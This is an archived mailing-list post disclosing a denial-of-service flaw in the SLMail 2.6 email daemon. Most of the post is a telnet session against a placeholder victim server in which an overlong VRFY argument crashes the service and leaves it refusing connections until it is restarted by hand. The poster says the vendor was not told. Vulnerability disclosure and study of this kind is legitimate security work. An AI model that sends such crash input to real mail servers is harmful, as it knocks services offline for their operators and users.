Hello, I have recently found a quite serious DoS attack for the SLMail 2.6 email daemon (www.seattlelabs.com/slmail). A long string of text after a command makes the program crash. I have only tested this on 2.6, so I'm not sure if other versions are vulnerable. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... Connected to www.victim.com. Escape character is '^]'. 220 www.victim.com Smtp Server SLMail v2.6 Ready ESMTP spoken here vrfy dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd Connection closed by foreign host. craphole:~$ telnet www.victim.com 25 Trying 555.55.555.55... telnet: Unable to connect to remote host: Connection refused craphole:~$ It will stay unresponsive until manually restarted. I haven't mailed Seattle Labs about this, but I'm sure they'll figure it out. Later, Cisc0 @ Undernet stevenat_private
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:55 PDT